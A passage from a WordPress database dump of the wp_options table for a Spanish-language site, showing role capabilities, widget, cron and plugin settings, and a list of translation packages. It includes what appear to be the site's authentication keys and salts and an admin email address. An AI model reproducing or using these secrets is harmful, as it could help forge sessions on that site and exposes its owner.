'widget_categories','a:0:{}','yes'),(77,'widget_text','a:0:{}','yes'),(78,'widget_rss','a:0:{}','yes'),(79,'uninstall_plugins','a:0:{}','no'),(80,'timezone_string','','yes'),(81,'page_for_posts','0','yes'),(82,'page_on_front','100','yes'),(83,'default_post_format','0','yes'),(84,'link_manager_enabled','0','yes'),(85,'finished_splitting_shared_terms','1','yes'),(86,'site_icon','0','yes'),(87,'medium_large_size_w','768','yes'),(88,'medium_large_size_h','0','yes'),(89,'wp_page_for_privacy_policy','3','yes'),(90,'show_comments_cookies_opt_in','1','yes'),(91,'admin_email_lifespan','1679764611','yes'),(92,'disallowed_keys','','no'),(93,'comment_previously_approved','1','yes'),(94,'auto_plugin_theme_update_emails','a:0:{}','no'),(95,'auto_update_core_dev','enabled','yes'),(96,'auto_update_core_minor','enabled','yes'),(97,'auto_update_core_major','enabled','yes'),(98,'wp_force_deactivated_plugins','a:0:{}','yes'),(99,'initial_db_version','53496','yes'),(100,'wp_user_roles','a:5:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:61:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:34:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}}','yes'),(101,'fresh_site','0','yes'),(102,'WPLANG','es_ES','yes'),(103,'user_count','1','no'),(104,'widget_block','a:6:{i:2;a:1:{s:7:\"content\";s:19:\"<!-- wp:search /-->\";}i:3;a:1:{s:7:\"content\";s:160:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Entradas recientes</h2><!-- /wp:heading --><!-- wp:latest-posts /--></div><!-- /wp:group -->\";}i:4;a:1:{s:7:\"content\";s:233:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Comentarios recientes</h2><!-- /wp:heading --><!-- wp:latest-comments {\"displayAvatar\":false,\"displayDate\":false,\"displayExcerpt\":false} /--></div><!-- /wp:group -->\";}i:5;a:1:{s:7:\"content\";s:146:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Archivos</h2><!-- /wp:heading --><!-- wp:archives /--></div><!-- /wp:group -->\";}i:6;a:1:{s:7:\"content\";s:151:\"<!-- wp:group --><div class=\"wp-block-group\"><!-- wp:heading --><h2>Categorías</h2><!-- /wp:heading --><!-- wp:categories /--></div><!-- /wp:group -->\";}s:12:\"_multiwidget\";i:1;}','yes'),(105,'sidebars_widgets','a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:3:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";}s:9:\"sidebar-2\";a:2:{i:0;s:7:\"block-5\";i:1;s:7:\"block-6\";}s:13:\"array_version\";i:3;}','yes'),(106,'cron','a:7:{i:1667845012;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1667884612;a:4:{s:18:\"wp_https_detection\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1667884629;a:1:{s:21:\"wp_update_user_counts\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1667927812;a:2:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1667927829;a:2:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1667927830;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}s:7:\"version\";i:2;}','yes'),(107,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(108,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(109,'widget_archives','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(110,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(111,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(112,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(113,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(114,'widget_meta','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(115,'widget_search','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(116,'nonce_key','%eVC&JhFsNI}u:7KfUA@^v}:>F*.WIC]J{4$T_+Y;d 0i4tL&h,A`KTPRT$1Zp+R','no'),(117,'nonce_salt','ah.,u&D+WSu:WZ|LiHL!c,hr6^3;}NpUlNynz0Xw(LP q%J#Yh]&,GtlJQ^(b[;t','no'),(118,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(119,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(120,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(122,'recovery_keys','a:0:{}','yes'),(125,'theme_mods_twentytwentytwo','a:1:{s:18:\"custom_css_post_id\";i:-1;}','yes'),(128,'https_detection_errors','a:1:{s:19:\"bad_response_source\";a:1:{i:0;s:50:\"Parece que la respuesta no proviene de este sitio.\";}}','yes'),(140,'secure_auth_key','_eql9-zY]<79I?*N2D*1v(0jq*^4L}jSifiCr/TN{k-+RN8?iU=lE-K2B:5`ez=Z','no'),(141,'secure_auth_salt','432m!`MQXpxZd%*Sfw`C@V^Dvq*eIUtT}gg)#E`u/SJ8O7xW8g9e`g^IOyUWwx r','no'),(142,'logged_in_key','d~JrO4uA(AW&oY>4aU-GogYEaM}lEEi!oi&5aCd0bx1[)@T@5q@i+a=)yp,G8E/y','no'),(143,'logged_in_salt','CT4q+@<R6qOKRK)2SzizWY##GUy$~w$s[A7dI;fTPd@uEm[Dy#;a[_=Ia}$m@Ev8','no'),(151,'can_compress_scripts','1','no'),(162,'recently_activated','a:2:{s:23:\"ml-slider/ml-slider.php\";i:1664286770;s:27:\"logo-carousel-free/main.php\";i:1664286756;}','yes'),(167,'logo_carousel_free_version','3.4.13','yes'),(168,'logo_carousel_free_db_version','3.4.13','yes'),(169,'logo_carousel_free_first_version','3.4.13','yes'),(170,'logo_carousel_free_activation_date','1664212690','yes'),(171,'_sp_lcpro_options','a:7:{s:17:\"lcpro_data_remove\";b:0;s:25:\"lcpro_enqueue_css_heading\";s:0:\"\";s:21:\"lcpro_fontawesome_css\";b:1;s:16:\"lcpro_swiper_css\";b:1;s:24:\"lcpro_enqueue_js_heading\";s:0:\"\";s:15:\"lcpro_swiper_js\";b:1;s:16:\"lcpro_custom_css\";s:0:\"\";}','yes'),(174,'finished_updating_comment_type','1','yes'),(175,'sp_logo_carousel_free_review_notice_dismiss','a:2:{s:4:\"time\";i:1664212690;s:9:\"dismissed\";b:0;}','yes'),(295,'ms_was_installed_on','1664286231','yes'),(296,'widget_metaslider_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(297,'ms_hide_all_ads_until','1665495837','yes'),(298,'metaslider_systemcheck','a:2:{s:16:\"wordPressVersion\";b:0;s:12:\"imageLibrary\";b:0;}','no'),(299,'ml-slider_children','a:0:{}','yes'),(300,'metaslider_tour_cancelled_on','add-slide','yes'),(331,'widget_widget_carousel_slider','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(355,'wpcf7','a:2:{s:7:\"version\";s:5:\"5.6.3\";s:13:\"bulk_validate\";a:4:{s:9:\"timestamp\";i:1664288819;s:7:\"version\";s:5:\"5.6.3\";s:11:\"count_valid\";i:1;s:13:\"count_invalid\";i:0;}}','yes'),(427,'secret_key','sn7ZdF!/G?=6O}W0,^#op Zr-G.35RP+4hiR}9Z-zYvfe9u+$Bf;Jp/5LVtzf{|p','no'),(508,'_transient_health-check-site-status-result','{\"good\":15,\"recommended\":4,\"critical\":0}','yes'),(2845,'category_children','a:0:{}','yes'),(73933,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:14:\"wp@brotead.com\";s:7:\"version\";s:3:\"6.1\";s:9:\"timestamp\";i:1667366229;}','no'),(157895,'widget_recent-posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(157896,'widget_recent-comments','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(174439,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:1:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:6:\"latest\";s:8:\"download\";s:63:\"https://downloads.wordpress.org/release/es_ES/wordpress-6.1.zip\";s:6:\"locale\";s:5:\"es_ES\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:63:\"https://downloads.wordpress.org/release/es_ES/wordpress-6.1.zip\";s:10:\"no_content\";s:0:\"\";s:11:\"new_bundled\";s:0:\"\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:3:\"6.1\";s:7:\"version\";s:3:\"6.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";}}s:12:\"last_checked\";i:1667841414;s:15:\"version_checked\";s:3:\"6.1\";s:12:\"translations\";a:0:{}}','no'),(187731,'_site_transient_timeout_available_translations','1667844779','no'),(187732,'_site_transient_available_translations','a:129:{s:2:\"af\";a:8:{s:8:\"language\";s:2:\"af\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2021-05-13 15:59:22\";s:12:\"english_name\";s:9:\"Afrikaans\";s:11:\"native_name\";s:9:\"Afrikaans\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/5.8-beta/af.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"af\";i:2;s:3:\"afr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Gaan voort\";}}s:2:\"am\";a:8:{s:8:\"language\";s:2:\"am\";s:7:\"version\";s:5:\"6.0.3\";s:7:\"updated\";s:19:\"2022-09-29 20:43:49\";s:12:\"english_name\";s:7:\"Amharic\";s:11:\"native_name\";s:12:\"አማርኛ\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.0.3/am.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"am\";i:2;s:3:\"amh\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"ቀጥል\";}}s:3:\"arg\";a:8:{s:8:\"language\";s:3:\"arg\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-09-22 16:46:56\";s:12:\"english_name\";s:9:\"Aragonese\";s:11:\"native_name\";s:9:\"Aragonés\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/translation/core/6.1/arg.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"an\";i:2;s:3:\"arg\";i:3;s:3:\"arg\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continar\";}}s:2:\"ar\";a:8:{s:8:\"language\";s:2:\"ar\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-04 13:58:35\";s:12:\"english_name\";s:6:\"Arabic\";s:11:\"native_name\";s:14:\"العربية\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/6.1/ar.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ar\";i:2;s:3:\"ara\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"المتابعة\";}}s:3:\"ary\";a:8:{s:8:\"language\";s:3:\"ary\";s:7:\"version\";s:6:\"4.8.21\";s:7:\"updated\";s:19:\"2017-01-26 15:42:35\";s:12:\"english_name\";s:15:\"Moroccan Arabic\";s:11:\"native_name\";s:31:\"العربية المغربية\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/4.8.21/ary.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ar\";i:3;s:3:\"ary\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"المتابعة\";}}s:2:\"as\";a:8:{s:8:\"language\";s:2:\"as\";s:7:\"version\";s:5:\"5.8.6\";s:7:\"updated\";s:19:\"2021-09-08 17:57:56\";s:12:\"english_name\";s:8:\"Assamese\";s:11:\"native_name\";s:21:\"অসমীয়া\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/5.8.6/as.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"as\";i:2;s:3:\"asm\";i:3;s:3:\"asm\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:3:\"azb\";a:8:{s:8:\"language\";s:3:\"azb\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-09-12 20:34:31\";s:12:\"english_name\";s:17:\"South Azerbaijani\";s:11:\"native_name\";s:29:\"گؤنئی آذربایجان\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/azb.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"az\";i:3;s:3:\"azb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"az\";a:8:{s:8:\"language\";s:2:\"az\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-06 00:09:27\";s:12:\"english_name\";s:11:\"Azerbaijani\";s:11:\"native_name\";s:16:\"Azərbaycan dili\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/az.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"az\";i:2;s:3:\"aze\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Davam\";}}s:3:\"bel\";a:8:{s:8:\"language\";s:3:\"bel\";s:7:\"version\";s:6:\"4.9.22\";s:7:\"updated\";s:19:\"2019-10-29 07:54:22\";s:12:\"english_name\";s:10:\"Belarusian\";s:11:\"native_name\";s:29:\"Беларуская мова\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/4.9.22/bel.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"be\";i:2;s:3:\"bel\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Працягнуць\";}}s:5:\"bg_BG\";a:8:{s:8:\"language\";s:5:\"bg_BG\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-10-31 19:09:15\";s:12:\"english_name\";s:9:\"Bulgarian\";s:11:\"native_name\";s:18:\"Български\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/bg_BG.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"bg\";i:2;s:3:\"bul\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Напред\";}}s:5:\"bn_BD\";a:8:{s:8:\"language\";s:5:\"bn_BD\";s:7:\"version\";s:6:\"5.4.12\";s:7:\"updated\";s:19:\"2020-10-31 08:48:37\";s:12:\"english_name\";s:20:\"Bengali (Bangladesh)\";s:11:\"native_name\";s:15:\"বাংলা\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/5.4.12/bn_BD.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"bn\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:23:\"এগিয়ে চল.\";}}s:2:\"bo\";a:8:{s:8:\"language\";s:2:\"bo\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2020-10-30 03:24:38\";s:12:\"english_name\";s:7:\"Tibetan\";s:11:\"native_name\";s:21:\"བོད་ཡིག\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/5.8-beta/bo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"bo\";i:2;s:3:\"tib\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:33:\"མུ་མཐུད་དུ།\";}}s:5:\"bs_BA\";a:8:{s:8:\"language\";s:5:\"bs_BA\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-08-09 10:47:25\";s:12:\"english_name\";s:7:\"Bosnian\";s:11:\"native_name\";s:8:\"Bosanski\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/bs_BA.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"bs\";i:2;s:3:\"bos\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Nastavi\";}}s:2:\"ca\";a:8:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-02 12:48:12\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/6.1/ca.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ca\";i:2;s:3:\"cat\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continua\";}}s:3:\"ceb\";a:8:{s:8:\"language\";s:3:\"ceb\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-03-02 17:25:51\";s:12:\"english_name\";s:7:\"Cebuano\";s:11:\"native_name\";s:7:\"Cebuano\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/ceb.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"ceb\";i:3;s:3:\"ceb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Padayun\";}}s:5:\"cs_CZ\";a:8:{s:8:\"language\";s:5:\"cs_CZ\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-07 11:26:23\";s:12:\"english_name\";s:5:\"Czech\";s:11:\"native_name\";s:9:\"Čeština\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/cs_CZ.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"cs\";i:2;s:3:\"ces\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:11:\"Pokračovat\";}}s:2:\"cy\";a:8:{s:8:\"language\";s:2:\"cy\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-10-25 14:15:25\";s:12:\"english_name\";s:5:\"Welsh\";s:11:\"native_name\";s:7:\"Cymraeg\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/6.1/cy.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"cy\";i:2;s:3:\"cym\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Parhau\";}}s:5:\"da_DK\";a:8:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-03 14:43:53\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/da_DK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"da\";i:2;s:3:\"dan\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Fortsæt\";}}s:14:\"de_CH_informal\";a:8:{s:8:\"language\";s:14:\"de_CH_informal\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-02 17:33:39\";s:12:\"english_name\";s:30:\"German (Switzerland, Informal)\";s:11:\"native_name\";s:21:\"Deutsch (Schweiz, Du)\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/translation/core/6.1/de_CH_informal.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:5:\"de_DE\";a:8:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-04 21:15:59\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/de_DE.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:5:\"de_CH\";a:8:{s:8:\"language\";s:5:\"de_CH\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-02 17:31:02\";s:12:\"english_name\";s:20:\"German (Switzerland)\";s:11:\"native_name\";s:17:\"Deutsch (Schweiz)\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/de_CH.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:12:\"de_DE_formal\";a:8:{s:8:\"language\";s:12:\"de_DE_formal\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-04 15:32:53\";s:12:\"english_name\";s:15:\"German (Formal)\";s:11:\"native_name\";s:13:\"Deutsch (Sie)\";s:7:\"package\";s:69:\"https://downloads.wordpress.org/translation/core/6.1/de_DE_formal.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:5:\"de_AT\";a:8:{s:8:\"language\";s:5:\"de_AT\";s:7:\"version\";s:5:\"6.0.3\";s:7:\"updated\";s:19:\"2022-03-17 12:58:14\";s:12:\"english_name\";s:16:\"German (Austria)\";s:11:\"native_name\";s:21:\"Deutsch (Österreich)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.0.3/de_AT.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:3:\"dsb\";a:8:{s:8:\"language\";s:3:\"dsb\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-07-16 12:13:09\";s:12:\"english_name\";s:13:\"Lower Sorbian\";s:11:\"native_name\";s:16:\"Dolnoserbšćina\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/translation/core/6.1/dsb.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"dsb\";i:3;s:3:\"dsb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Dalej\";}}s:3:\"dzo\";a:8:{s:8:\"language\";s:3:\"dzo\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-06-29 08:59:03\";s:12:\"english_name\";s:8:\"Dzongkha\";s:11:\"native_name\";s:18:\"རྫོང་ཁ\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/dzo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"dz\";i:2;s:3:\"dzo\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"el\";a:8:{s:8:\"language\";s:2:\"el\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-11-07 13:04:07\";s:12:\"english_name\";s:5:\"Greek\";s:11:\"native_name\";s:16:\"Ελληνικά\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/6.1/el.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"el\";i:2;s:3:\"ell\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"Συνέχεια\";}}s:5:\"en_CA\";a:8:{s:8:\"language\";s:5:\"en_CA\";s:7:\"version\";s:3:\"6.1\";s:7:\"updated\";s:19:\"2022-10-28 23:54:28\";s:12:\"english_name\";s:16:\"English (Canada)\";s:11:\"native_name\";s:16:\"English (Canada)\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.1/en_CA.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"en\";i:2;s:3:\"eng\";i:3;s:3:\"eng\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"en_ZA\";a:8:{s:8:\"language\";s:5:\"en_ZA\";s:7:\"version\";s:5:\"6.0.3\";s:7:\"updated\";s:19:\"2021-12-24 12:36:39\";s:12:\"english_name\";s:22:\"English (South Africa)\";s:11:\"native_name\";s:22:\"English (South 